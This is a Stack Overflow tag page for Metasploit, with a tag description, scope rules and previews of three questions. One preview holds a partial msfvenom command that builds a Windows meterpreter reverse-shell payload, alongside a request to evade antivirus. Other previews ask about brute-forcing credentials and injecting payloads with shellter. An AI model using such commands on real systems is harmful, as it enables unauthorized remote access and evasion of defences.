Questions tagged [metasploit]

This tag is for questions about *programming* the Metasploit framework, not for using the framework or attacking a specific site.

The Metasploit Framework is an open-source project owned/sponsored by Rapid7 for vulnerability assessment, exploitation development, penetration testing, and many other computer and network security-related tasks.

Since version 3 of the Framework, Metasploit has been written primarily in Ruby. Version 2 and older were written in Perl. The various payloads, stagers, and shellcodes are primarily written in C, assembly, and Java.

Metasploit is developed on Github. Documentation and community forums are available on Rapid7's community site. Questions can also be asked in the #metasploit channel on Freenode.

If your question is about using Metasploit, rather than programming with it, then it should probably go on our sister site Information Security.

If your question is about attacking a specific system, such questions are off-topic on Stack Overflow. They are also off-topic on Information Security unless they demonstrate an understanding of the concepts involved and clearly identify a specific problem.

Also, any issues resulting from using such tools without permission from the target are your own risk; we do not endorse such actions in any way.

228 questions
-3
votes
1 answer

Psexec brute forcing credentials

I am currently pen-testing with a Kali software installed machine and a Windows 8 installed Machine. I am trying to gain access with a psexec_command attack with Metasploit. Is there maybe a way that I could brute force the credentials for the…
-4
votes
0 answers

Hello everyone, I have a problem my payload detected by antiviruses

Hello antiviruses are detected my payload, I found a solution on YouTube video, but it doesn't work for me. commmands systemctl start postgresql && msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.000.000 LPORT=4445 -f exe -e…
-4
votes
2 answers

How to create "native 32 bit" application?

I am using shellter in my kali linux and want to inject a file using the software? I created a Simple Calculator in C# using visual studio with plateform x86 and release mode while compiling. But still shellter shows error that it only support…
1 2 3
15
16